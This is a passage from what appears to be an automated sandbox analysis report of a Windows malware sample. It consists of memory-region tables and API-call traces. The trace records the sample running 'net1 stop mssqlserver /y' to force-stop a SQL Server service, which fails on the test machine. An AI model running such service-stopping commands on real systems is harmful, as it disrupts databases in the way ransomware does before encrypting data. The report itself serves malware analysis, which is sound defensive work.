(normalized: "c:\\windows\\system32\\bcrypt.dll") Region: id = 1338 start_va = 0x7ff87d030000 end_va = 0x7ff87d099fff monitored = 0 entry_point = 0x7ff87d066d50 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\System32\\bcryptprimitives.dll" (normalized: "c:\\windows\\system32\\bcryptprimitives.dll") Region: id = 1339 start_va = 0x540000 end_va = 0x6cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000540000" filename = "" Region: id = 1340 start_va = 0x540000 end_va = 0x546fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000540000" filename = "" Region: id = 1341 start_va = 0x6c0000 end_va = 0x6cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000006c0000" filename = "" Region: id = 1779 start_va = 0x550000 end_va = 0x552fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "netmsg.dll" filename = "\\Windows\\System32\\netmsg.dll" (normalized: "c:\\windows\\system32\\netmsg.dll") Thread: id = 57 os_tid = 0x630 [0139.257] GetModuleHandleW (lpModuleName=0x0) returned 0x7ff6fccc0000 [0139.257] __set_app_type (_Type=0x1) [0139.257] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x7ff6fccc54b0) returned 0x0 [0139.257] __getmainargs (in: _Argc=0x7ff6fcceac88, _Argv=0x7ff6fcceac90, _Env=0x7ff6fcceac98, _DoWildCard=0, _StartInfo=0x7ff6fcceaca4 | out: _Argc=0x7ff6fcceac88, _Argv=0x7ff6fcceac90, _Env=0x7ff6fcceac98) returned 0 [0139.258] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0139.258] GetConsoleOutputCP () returned 0x1b5 [0139.879] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x7ff6fccf2a20 | out: lpCPInfo=0x7ff6fccf2a20) returned 1 [0139.879] SetThreadUILanguage (LangId=0x0) returned 0x409 [0139.924] sprintf_s (in: _DstBuf=0xcfc70, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 4 [0139.924] setlocale (category=0, locale=".437") returned="English_United States.437" [0139.926] GetStdHandle (nStdHandle=0xfffffff5) returned 0x24 [0139.926] GetStdHandle (nStdHandle=0xfffffff4) returned 0x28 [0139.926] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop mssqlserver /y" [0139.926] GetModuleFileNameW (in: hModule=0x0, lpFilename=0xcfcd0, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\net1.exe" (normalized: "c:\\windows\\system32\\net1.exe")) returned 0x1c [0139.926] RtlAllocateHeap (HeapHandle=0x100000, Flags=0x0, Size=0x7a) returned 0x10b170 [0139.926] _wcsnicmp (_String1="/Y", _String2="/y", _MaxCount=0x2) returned 0 [0139.927] NetApiBufferAllocate (in: ByteCount=0x18, Buffer=0xcfc58 | out: Buffer=0xcfc58*=0x109190) returned 0x0 [0139.927] NetApiBufferAllocate (in: ByteCount=0x18, Buffer=0xcfc60 | out: Buffer=0xcfc60*=0x1086b0) returned 0x0 [0139.927] __iob_func () returned 0x7ff87fe6e210 [0139.927] _fileno (_File=0x7ff87fe6e210) returned 0 [0139.927] _setmode (_FileHandle=0, _Mode=16384) returned 16384 [0139.927] _wcsicmp (_String1="accounts", _String2="stop") returned -18 [0139.927] _wcsicmp (_String1="computer", _String2="stop") returned -16 [0139.927] _wcsicmp (_String1="config", _String2="stop") returned -16 [0139.927] _wcsicmp (_String1="continue", _String2="stop") returned -16 [0139.927] _wcsicmp (_String1="cont", _String2="stop") returned -16 [0139.927] _wcsicmp (_String1="file", _String2="stop") returned -13 [0139.927] _wcsicmp (_String1="files", _String2="stop") returned -13 [0139.927] _wcsicmp (_String1="group", _String2="stop") returned -12 [0139.927] _wcsicmp (_String1="groups", _String2="stop") returned -12 [0139.927] _wcsicmp (_String1="help", _String2="stop") returned -11 [0139.927] _wcsicmp (_String1="helpmsg", _String2="stop") returned -11 [0139.927] _wcsicmp (_String1="localgroup", _String2="stop") returned -7 [0139.928] _wcsicmp (_String1="pause", _String2="stop") returned -3 [0139.928] _wcsicmp (_String1="session", _String2="stop") returned -15 [0139.928] _wcsicmp (_String1="sessions", _String2="stop") returned -15 [0139.928] _wcsicmp (_String1="sess", _String2="stop") returned -15 [0139.928] _wcsicmp (_String1="share", _String2="stop") returned -12 [0139.928] _wcsicmp (_String1="start", _String2="stop") returned -14 [0139.928] _wcsicmp (_String1="stats", _String2="stop") returned -14 [0139.928] _wcsicmp (_String1="statistics", _String2="stop") returned -14 [0139.928] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0139.928] _wcsicmp (_String1="accounts", _String2="mssqlserver") returned -12 [0139.928] _wcsicmp (_String1="computer", _String2="mssqlserver") returned -10 [0139.928] _wcsicmp (_String1="config", _String2="mssqlserver") returned -10 [0139.928] _wcsicmp (_String1="continue", _String2="mssqlserver") returned -10 [0139.928] _wcsicmp (_String1="cont", _String2="mssqlserver") returned -10 [0139.928] _wcsicmp (_String1="file", _String2="mssqlserver") returned -7 [0139.928] _wcsicmp (_String1="files", _String2="mssqlserver") returned -7 [0139.928] _wcsicmp (_String1="group", _String2="mssqlserver") returned -6 [0139.928] _wcsicmp (_String1="groups", _String2="mssqlserver") returned -6 [0139.928] _wcsicmp (_String1="help", _String2="mssqlserver") returned -5 [0139.928] _wcsicmp (_String1="helpmsg", _String2="mssqlserver") returned -5 [0139.928] _wcsicmp (_String1="localgroup", _String2="mssqlserver") returned -1 [0139.928] _wcsicmp (_String1="pause", _String2="mssqlserver") returned 3 [0139.928] _wcsicmp (_String1="session", _String2="mssqlserver") returned 6 [0139.928] _wcsicmp (_String1="sessions", _String2="mssqlserver") returned 6 [0139.928] _wcsicmp (_String1="sess", _String2="mssqlserver") returned 6 [0139.929] _wcsicmp (_String1="share", _String2="mssqlserver") returned 6 [0139.929] _wcsicmp (_String1="start", _String2="mssqlserver") returned 6 [0139.929] _wcsicmp (_String1="stats", _String2="mssqlserver") returned 6 [0139.929] _wcsicmp (_String1="statistics", _String2="mssqlserver") returned 6 [0139.929] _wcsicmp (_String1="stop", _String2="mssqlserver") returned 6 [0139.929] _wcsicmp (_String1="time", _String2="mssqlserver") returned 7 [0139.929] _wcsicmp (_String1="user", _String2="mssqlserver") returned 8 [0139.929] _wcsicmp (_String1="users", _String2="mssqlserver") returned 8 [0139.929] _wcsicmp (_String1="msg", _String2="mssqlserver") returned -12 [0139.929] _wcsicmp (_String1="messenger", _String2="mssqlserver") returned -14 [0139.929] _wcsicmp (_String1="receiver", _String2="mssqlserver") returned 5 [0139.929] _wcsicmp (_String1="rcv", _String2="mssqlserver") returned 5 [0139.929] _wcsicmp (_String1="netpopup", _String2="mssqlserver") returned 1 [0139.929] _wcsicmp (_String1="redirector", _String2="mssqlserver") returned 5 [0139.929] _wcsicmp (_String1="redir", _String2="mssqlserver") returned 5 [0139.929] _wcsicmp (_String1="rdr", _String2="mssqlserver") returned 5 [0139.929] _wcsicmp (_String1="workstation", _String2="mssqlserver") returned 10 [0139.929] _wcsicmp (_String1="work", _String2="mssqlserver") returned 10 [0139.929] _wcsicmp (_String1="wksta", _String2="mssqlserver") returned 10 [0139.929] _wcsicmp (_String1="prdr", _String2="mssqlserver") returned 3 [0139.929] _wcsicmp (_String1="devrdr", _String2="mssqlserver") returned -9 [0139.929] _wcsicmp (_String1="lanmanworkstation", _String2="mssqlserver") returned -1 [0139.929] _wcsicmp (_String1="server", _String2="mssqlserver") returned 6 [0139.929] _wcsicmp (_String1="svr", _String2="mssqlserver") returned 6 [0139.929] _wcsicmp (_String1="srv", _String2="mssqlserver") returned 6 [0139.929] _wcsicmp (_String1="lanmanserver", _String2="mssqlserver") returned -1 [0139.929] _wcsicmp (_String1="alerter", _String2="mssqlserver") returned -12 [0139.929] _wcsicmp (_String1="netlogon", _String2="mssqlserver") returned 1 [0139.929] _wcsupr (in: _String="mssqlserver" | out: _String="MSSQLSERVER") returned="MSSQLSERVER" [0139.930] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x80000000) returned 0x10dd00 [0139.937] GetServiceKeyNameW (in: hSCManager=0x10dd00, lpDisplayName="MSSQLSERVER", lpServiceName=0x7ff6fccf4b10, lpcchBuffer=0xcfb90 | out: lpServiceName="", lpcchBuffer=0xcfb90) returned 0 [0144.505] _wcsicmp (_String1="msg", _String2="MSSQLSERVER") returned -12 [0144.505] _wcsicmp (_String1="messenger", _String2="MSSQLSERVER") returned -14 [0144.505] _wcsicmp (_String1="receiver", _String2="MSSQLSERVER") returned 5 [0144.505] _wcsicmp (_String1="rcv", _String2="MSSQLSERVER") returned 5 [0144.506] _wcsicmp (_String1="redirector", _String2="MSSQLSERVER") returned 5 [0144.506] _wcsicmp (_String1="redir", _String2="MSSQLSERVER") returned 5 [0144.506] _wcsicmp (_String1="rdr", _String2="MSSQLSERVER") returned 5 [0144.506] _wcsicmp (_String1="workstation", _String2="MSSQLSERVER") returned 10 [0144.506] _wcsicmp (_String1="work", _String2="MSSQLSERVER") returned 10 [0144.506] _wcsicmp (_String1="wksta", _String2="MSSQLSERVER") returned 10 [0144.506] _wcsicmp (_String1="prdr", _String2="MSSQLSERVER") returned 3 [0144.506] _wcsicmp (_String1="devrdr", _String2="MSSQLSERVER") returned -9 [0144.506] _wcsicmp (_String1="lanmanworkstation", _String2="MSSQLSERVER") returned -1 [0144.506] _wcsicmp (_String1="server", _String2="MSSQLSERVER") returned 6 [0144.506] _wcsicmp (_String1="svr", _String2="MSSQLSERVER") returned 6 [0144.506] _wcsicmp (_String1="srv", _String2="MSSQLSERVER") returned 6 [0144.506] _wcsicmp (_String1="lanmanserver", _String2="MSSQLSERVER") returned -1 [0144.506] _wcsicmp (_String1="alerter", _String2="MSSQLSERVER") returned -12 [0144.506] _wcsicmp (_String1="netlogon", _String2="MSSQLSERVER") returned 1 [0144.506] _wcsicmp (_String1="MSSQLSERVER", _String2="WORKSTATION") returned -10 [0144.507] _wcsicmp (_String1="MSSQLSERVER", _String2="LanmanWorkstation") returned 1 [0144.507] _wcsicmp (_String1="MSSQLSERVER", _String2="SERVER") returned -6 [0144.507] _wcsicmp (_String1="MSSQLSERVER", _String2="LanmanServer") returned 1 [0144.507] _wcsicmp (_String1="MSSQLSERVER", _String2="BROWSER") returned 11 [0144.507] _wcsicmp (_String1="MSSQLSERVER", _String2="BROWSER") returned 11 [0144.507] _wcsicmp (_String1="MSSQLSERVER", _String2="MESSENGER") returned 14 [0144.507] _wcsicmp (_String1="MSSQLSERVER", _String2="MESSENGER") returned 14 [0144.507] _wcsicmp (_String1="MSSQLSERVER", _String2="NETRUN") returned -1 [0144.507] _wcsicmp (_String1="MSSQLSERVER", _String2="NETRUN") returned -1 [0144.507] _wcsicmp (_String1="MSSQLSERVER", _String2="SPOOLER") returned -6 [0144.507] _wcsicmp (_String1="MSSQLSERVER", _String2="SPOOLER") returned -6 [0144.507] _wcsicmp (_String1="MSSQLSERVER", _String2="ALERTER") returned 12 [0144.507] _wcsicmp (_String1="MSSQLSERVER", _String2="ALERTER") returned 12 [0144.507] _wcsicmp (_String1="MSSQLSERVER", _String2="NETLOGON") returned -1 [0144.507] _wcsicmp (_String1="MSSQLSERVER", _String2="NETLOGON") returned -1 [0144.507] _wcsicmp (_String1="MSSQLSERVER", _String2="NETPOPUP") returned -1 [0144.507] _wcsicmp (_String1="MSSQLSERVER", _String2="NETPOPUP") returned -1 [0144.507] _wcsicmp (_String1="MSSQLSERVER", _String2="SQLSERVER") returned -6 [0144.507] _wcsicmp (_String1="MSSQLSERVER", _String2="SQLSERVER") returned -6 [0144.507] _wcsicmp (_String1="MSSQLSERVER", _String2="REPLICATOR") returned -5 [0144.507] _wcsicmp (_String1="MSSQLSERVER", _String2="REPLICATOR") returned -5 [0144.507] _wcsicmp (_String1="MSSQLSERVER", _String2="REMOTEBOOT") returned -5 [0144.507] _wcsicmp (_String1="MSSQLSERVER", _String2="REMOTEBOOT") returned -5 [0144.507] _wcsicmp (_String1="MSSQLSERVER", _String2="TIMESOURCE") returned -7 [0144.507] _wcsicmp (_String1="MSSQLSERVER", _String2="TIMESOURCE") returned -7 [0144.507] _wcsicmp (_String1="MSSQLSERVER", _String2="AFP") returned 12 [0144.507] _wcsicmp (_String1="MSSQLSERVER", _String2="AFP") returned 12 [0144.507] _wcsicmp (_String1="MSSQLSERVER", _String2="UPS") returned -8 [0144.507] _wcsicmp (_String1="MSSQLSERVER", _String2="UPS") returned -8 [0144.507] _wcsicmp (_String1="MSSQLSERVER", _String2="XACTSRV") returned -11 [0144.508] _wcsicmp (_String1="MSSQLSERVER", _String2="XACTSRV") returned -11 [0144.508] _wcsicmp (_String1="MSSQLSERVER", _String2="TCPIP") returned -7 [0144.508] _wcsicmp (_String1="MSSQLSERVER", _String2="TCPIP") returned -7 [0144.508] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x1) returned 0x10dca0 [0144.516] OpenServiceW (hSCManager=0x10dca0, lpServiceName="MSSQLSERVER", dwDesiredAccess=0x84) returned 0x0 [0144.524] GetLastError () returned 0x424 [0144.524] CloseServiceHandle (hSCObject=0x10dca0) returned 1 [0145.122] wcscmp (_String1="NETMSG", _String2="BASE") returned 1 [0145.122] wcscpy_s (in: _Destination=0x7ff6fccf34e0, _SizeInWords=0x104, _Source="NETMSG" | out: _Destination="NETMSG") returned 0x0 [0145.122] LoadLibraryExW (lpLibFileName="NETMSG", hFile=0x0, dwFlags=0x20) returned 0x550002 [0145.124] FormatMessageW (in: dwFlags=0x2a00, lpSource=0x550002, dwMessageId=0x889, dwLanguageId=0x0, lpBuffer=0x7ff6fccf3b00, nSize=0x800, Arguments=0x7ff6fccf3260 | out: lpBuffer="The service name is invalid.\r\n") returned 0x1e [0145.128] GetFileType (hFile=0x28) returned 0x2 [0145.128] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0xcf98c | out: lpMode=0xcf98c) returned 1 [0145.485] WriteConsoleW (in: hConsoleOutput=0x28, lpBuffer=0x7ff6fccf3b00*, nNumberOfCharsToWrite=0x1e, lpNumberOfCharsWritten=0xcf980, lpReserved=0x0 | out: lpBuffer=0x7ff6fccf3b00*, lpNumberOfCharsWritten=0xcf980*=0x1e) returned 1 [0145.826] GetFileType (hFile=0x28) returned 0x2 [0145.826] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0xcf98c | out: lpMode=0xcf98c) returned 1 [0145.994] WriteConsoleW (in: hConsoleOutput=0x28, lpBuffer=0x7ff6fcce0a84*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xcf980, lpReserved=0x0 | out: lpBuffer=0x7ff6fcce0a84*, lpNumberOfCharsWritten=0xcf980*=0x2) returned 1 [0146.143] _ultow (in: _Dest=0x889, _Radix=850336 | out: _Dest=0x889) returned="2185" [0146.143] wcscmp (_String1="NETMSG", _String2="BASE") returned 1 [0146.143] FormatMessageW (in: dwFlags=0x2800, lpSource=0x550002, dwMessageId=0xdba, dwLanguageId=0x0, lpBuffer=0x7ff6fccf3b00, nSize=0x800, Arguments=0x7ff6fccf3260 | out: lpBuffer="More help is available by typing NET HELPMSG 2185.\r\n") returned 0x34 [0146.144] GetFileType (hFile=0x28) returned 0x2 [0146.144] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0xcf938 | out: lpMode=0xcf938) returned 1 [0146.162] WriteConsoleW (in: hConsoleOutput=0x28, lpBuffer=0x7ff6fccf3b00*, nNumberOfCharsToWrite=0x34, lpNumberOfCharsWritten=0xcf930, lpReserved=0x0 | out: lpBuffer=0x7ff6fccf3b00*, lpNumberOfCharsWritten=0xcf930*=0x34) returned 1 [0146.162] GetFileType (hFile=0x28) returned 0x2 [0146.162] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0xcf938 | out: lpMode=0xcf938) returned 1 [0146.163] WriteConsoleW (in: hConsoleOutput=0x28, lpBuffer=0x7ff6fcce0a84*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xcf930, lpReserved=0x0 | out: lpBuffer=0x7ff6fcce0a84*, lpNumberOfCharsWritten=0xcf930*=0x2) returned 1 [0146.163] NetApiBufferFree (Buffer=0x109190) returned 0x0 [0146.163] NetApiBufferFree (Buffer=0x1086b0) returned 0x0 [0146.164] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop mssqlserver /y" [0146.164] exit (_Code=2) Thread: id = 58 os_tid = 0x894 Process: id = "18" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0x7496b000" os_pid = "0x3e8" os_integrity_level = "0x4000" os_privileges = "0xe60b1e890" monitor_reason = "rpc_server" parent_id = "8" os_parent_pid = "0x214" cmd_line = "C:\\Windows\\system32\\svchost.exe -k netsvcs" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\BDESVC" [0xa], "NT SERVICE\\BITS" [0xa], "NT SERVICE\\CertPropSvc" [0xa], "NT SERVICE\\DcpSvc" [0xa], "NT SERVICE\\dmwappushservice" [0xa], "NT SERVICE\\DoSvc" [0xa], "NT SERVICE\\DsmSvc" [0xa], "NT SERVICE\\EapHost" [0xa], "NT SERVICE\\IKEEXT" [0xa], "NT SERVICE\\iphlpsvc" [0xa], "NT SERVICE\\LanmanServer" [0xa], "NT SERVICE\\lfsvc" [0xe], "NT SERVICE\\MSiSCSI" [0xa], "NT SERVICE\\NcaSvc" [0xa], "NT SERVICE\\NetSetupSvc" [0xa], "NT SERVICE\\RasAuto" [0xa], "NT SERVICE\\RasMan" [0xa], "NT SERVICE\\RemoteAccess" [0xa], "NT SERVICE\\RetailDemo" [0xa], "NT SERVICE\\Schedule" [0xa], "NT SERVICE\\SCPolicySvc" [0xa], "NT SERVICE\\SENS" [0xa], "NT SERVICE\\SessionEnv" [0xa], "NT SERVICE\\SharedAccess" [0xa], "NT SERVICE\\ShellHWDetection" [0xa], "NT SERVICE\\UsoSvc" [0xa], "NT SERVICE\\wercplsupport" [0xa], "NT SERVICE\\Winmgmt" [0xa], "NT SERVICE\\wlidsvc" [0xa], "NT SERVICE\\wuauserv" [0xa], "NT SERVICE\\XboxNetApiSvc" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000c9f4" [0xc0000007], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe] Region: id = 1391 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 1392 start_va = 0x20000 end_va = 0x21fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 1393 start_va = 0x30000 end_va = 0x44fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 1394 start_va = 0x50000 end_va = 0xcffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 1395 start_va = 0xd0000 end_va = 0xd3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000d0000" filename = "" Region: id = 1396 start_va = 0xe0000 end_va = 0xe0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000e0000" filename = "" Region: id = 1397 start_va = 0xf0000 end_va = 0xf1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 1398 start_va = 0x100000 end_va = 0x1bdfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 1399 start_va = 0x1c0000 end_va = 0x1c0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 1400 start_va = 0x1d0000 end_va = 0x1d0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 1401 start_va = 0x1e0000 end_va = 0x1e0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 1402 start_va = 0x1f0000 end_va = 0x1f0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001f0000" filename = "" Region: id = 1403 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 1404 start_va = 0x400000 end_va = 0x400fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 1405 start_va = 0x410000 end_va = 0x410fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000410000" filename = "" Region: id = 1406 start_va = 0x420000 end_va = 0x420fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "msxml6r.dll" filename = "\\Windows\\System32\\msxml6r.dll" (normalized: "c:\\windows\\system32\\msxml6r.dll") Region: id = 1407 start_va = 0x430000 end_va = 0x430fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "usocore.dll.mui" filename = "\\Windows\\System32\\en-US\\usocore.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\usocore.dll.mui") Region: id = 1408 start_va = 0x460000 end_va = 0x461fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "dosvc.dll.mui" filename = "\\Windows\\System32\\en-US\\dosvc.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\dosvc.dll.mui") Region: id = 1409 start_va = 0x470000 end_va = 0x471fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 1410 start_va = 0x480000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000480000" filename = "" Region: id = 1411 start_va = 0x540000 end_va = 0x540fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 1412 start_va = 0x550000 end_va = 0x550fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000550000" filename = "" Region: id = 1413 start_va = 0x560000 end_va = 0x560fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000560000" filename = "" Region: id = 1414 start_va = 0x570000 end_va = 0x576fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 1415 start_va = 0x580000 end_va = 0x581fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 1416 start_va = 0x590000 end_va = 0x590fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000590000" filename = "" Region: id = 1417 start_va = 0x5a0000 end_va = 0x5a1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005a0000" filename = "" Region: id = 1418 start_va = 0x5b0000 end_va = 0x5b3fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 1419 start_va = 0x5c0000 end_va = 0x5c3fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 1420 start_va = 0x5e0000 end_va = 0x5e6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005e0000" filename = "" Region: id = 1421 start_va = 0x5f0000 end_va = 0x5f1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005f0000" filename = "" Region: id = 1422 start_va = 0x600000 end_va = 0x6fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000600000" filename = "" Region: id = 1423 start_va = 0x700000 end_va = 0x887fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000700000" filename = "" Region: id = 1424 start_va = 0x890000 end_va = 0x891fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000890000" filename = "" Region: id = 1425 start_va = 0x8a0000 end_va = 0x8a6fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "newdev.dll.mui" filename = "\\Windows\\System32\\en-US\\newdev.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\newdev.dll.mui") Region: id = 1426 start_va = 0x8b0000 end_va = 0x8b6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000008b0000" filename = "" Region: id = 1427 start_va = 0x8c0000 end_va = 0x8d7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000008c0000" filename = "" Region: id = 1428 start_va = 0x900000 end_va = 0x9fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000900000" filename = "" Region: id = 1429 start_va = 0xa00000 end_va = 0xb80fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000a00000" filename = "" Region: id = 1430 start_va = 0xb90000 end_va = 0xf8afff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000b90000" filename = "" Region: id = 1431 start_va = 0xf90000 end_va = 0xfd4fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x0000000000000005.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x0000000000000005.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x0000000000000005.db") Region: id = 1432 start_va = 0x1000000 end_va = 0x10fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001000000" filename = "" Region: id = 1433 start_va = 0x1100000 end_va = 0x117ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001100000" filename = "" Region: id = 1434 start_va = 0x11e0000 end_va = 0x11e6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000011e0000" filename = "" Region: id = 1435 start_va = 0x1200000 end_va = 0x12fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001200000" filename = "" Region: id = 1436 start_va = 0x1300000 end_va = 0x13fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001300000" filename = "" Region: id = 1437 start_va = 0x1400000 end_va = 0x14fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001400000" filename = "" Region: id = 1438 start_va = 0x1500000 end_va = 0x15fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001500000" filename = "" Region: id = 1439 start_va = 0x1600000 end_va = 0x1936fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 1440 start_va = 0x1940000 end_va = 0x1a3ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001940000" filename = "" Region: id = 1441 start_va = 0x1a40000 end_va = 0x1b3ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001a40000" filename = "" Region: id = 1442 start_va = 0x1b40000 end_va = 0x1c3ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001b40000" filename = "" Region: id = 1443 start_va = 0x1c40000 end_va = 0x1d3ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001c40000" filename = "" Region: id = 1444 start_va = 0x1d40000 end_va = 0x1e3ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001d40000" filename = "" Region: id = 1445 start_va = 0x1e40000 end_va = 0x1e82fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e40000" filename = "" Region: id = 1446 start_va = 0x1e90000 end_va = 0x1e96fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e90000" filename = "" Region: id = 1447 start_va = 0x1f00000 end_va = 0x1ffffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001f00000" filename = "" Region: id = 1448 start_va = 0x2000000 end_va = 0x20fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002000000" filename = "" Region: id = 1449 start_va = 0x2100000 end_va = 0x21fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002100000" filename = "" Region: id = 1450 start_va = 0x2200000 end_va = 0x22fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002200000" filename = "" Region: id = 1451 start_va = 0x2300000 end_va = 0x237ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002300000" filename = "" Region: id = 1452 start_va = 0x2380000 end_va = 0x23fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002380000" filename = "" Region: id = 1453 start_va = 0x2440000 end_va = 0x2446fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002440000" filename = "" Region: id = 1454 start_va = 0x2500000 end_va = 0x25fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002500000" filename = "" Region: id = 1455 start_va = 0x2600000 end_va = 0x26fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002600000" filename = "" Region: id = 1456 start_va = 0x2700000 end_va = 